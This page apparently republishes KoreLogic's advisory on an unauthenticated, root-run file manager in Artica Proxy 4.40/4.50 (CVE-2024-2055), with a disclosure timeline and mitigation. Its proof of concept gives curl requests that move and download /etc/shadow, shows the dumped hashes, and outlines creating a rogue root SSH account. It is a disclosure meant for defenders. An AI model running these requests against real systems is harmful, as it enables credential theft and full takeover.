Security
Headlines
HeadlinesLatestCVEs

Headline

Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation

The Rich Filemanager feature of Artica Proxy versions 4.40 and 4.50 provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. This provides an unauthenticated attacker complete access to the file system.

Packet Storm
#sql#vulnerability#web#debian#js#java#php#ldap#auth#ssh
KL-001-2024-003: Artica Proxy Unauthenticated File Manager VulnerabilityTitle: Artica Proxy Unauthenticated File Manager VulnerabilityAdvisory ID: KL-001-2024-003Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-288: Authentication Bypass Using an                          Alternate Path or Channel, CWE-552: Files                          or Directories Accessible to External                          Parties      CVE ID: CVE-2024-20552. Vulnerability Description      The "Rich Filemanager" feature of Artica Proxy provides a      web-based interface for file management capabilities. When      the feature is enabled, it does not require authentication by      default, and runs as the root user.3. Technical Description      The Artica Proxy can be installed with a small amount of      "Features" enabled. Within the administrative web interface,      additional features can be installed, enabled, and disabled. The      "Rich Filemanager" feature is disabled by default. Enabling      this feature will spawn a listener on port 5000/tcp bound to      0.0.0.0. By default, when this feature is enabled, authentication      is not required to access the web interface. The "Rich      Filemanager" runs as the root user. This provides an      unauthenticated attacker complete access to the file system.        root@artica:~# ps -efww | grep -i File        root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER        root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER      This can be exploited by an attacker to add entries in to      /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create      an additional root-level account that has the ability to SSH      in to the system.4. Mitigation and Remediation Recommendation      No response from vendor. Rich Filemanager feature is disabled      by default. Leave it that way.5. Credit      This vulnerability was discovered by Jim Becher of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2055 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      Step 1: Move /etc/shadow to /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}      Step 2: Download /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::      daemon:*:19507:0:99999:7:::      bin:*:19507:0:99999:7:::      sys:*:19507:0:99999:7:::      sync:*:19507:0:99999:7:::      games:*:19507:0:99999:7:::      man:*:19507:0:99999:7:::      lp:*:19507:0:99999:7:::      mail:*:19507:0:99999:7:::      news:*:19507:0:99999:7:::      uucp:*:19507:0:99999:7:::      proxy:*:19507:0:99999:7:::      www-data:*:19507:0:99999:7:::      backup:*:19507:0:99999:7:::      list:*:19507:0:99999:7:::      irc:*:19507:0:99999:7:::      gnats:*:19507:0:99999:7:::      nobody:*:19507:0:99999:7:::      _apt:*:19507:0:99999:7:::      systemd-timesync:*:19507:0:99999:7:::      systemd-network:*:19507:0:99999:7:::      systemd-resolve:*:19507:0:99999:7:::      messagebus:*:19507:0:99999:7:::      quagga:*:19507:0:99999:7:::      apt-mirror:*:19507:0:99999:7:::      privoxy:*:19507:0:99999:7:::      ntp:*:19507:0:99999:7:::      redsocks:!:19507:0:99999:7:::      prads:*:19507:0:99999:7:::      freerad:*:19507:0:99999:7:::      vnstat:*:19507:0:99999:7:::      stunnel4:!:19507:0:99999:7:::      sshd:*:19507:0:99999:7:::      vde2-net:*:19507:0:99999:7:::      memcache:!:19507:0:99999:7:::      davfs2:*:19507:0:99999:7:::      ziproxy:!:19507:0:99999:7:::      proftpd:!:19507:0:99999:7:::      ftp:*:19507:0:99999:7:::      mosquitto:*:19507:0:99999:7:::      openldap:!:19507:0:99999:7:::      munin:*:19507:0:99999:7:::      msmtp:*:19507:0:99999:7:::      Debian-snmp:!:19507:0:99999:7:::      opendkim:*:19507:0:99999:7:::      avahi:*:19507:0:99999:7:::      glances:*:19507:0:99999:7:::      ArticaStats:!:19507:0:99999:7:::      netdata:!:19507:0:99999:7:::      mysql:!:19507:0:99999:7:::      postfix:!:19507:0:99999:7:::      squid:!:19507:0:99999:7:::      smokeping:!:19507:0:99999:7:::      unbound:!:19645:0:99999:7:::      Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Packet Storm: Latest News

Debian Security Advisory 5804-1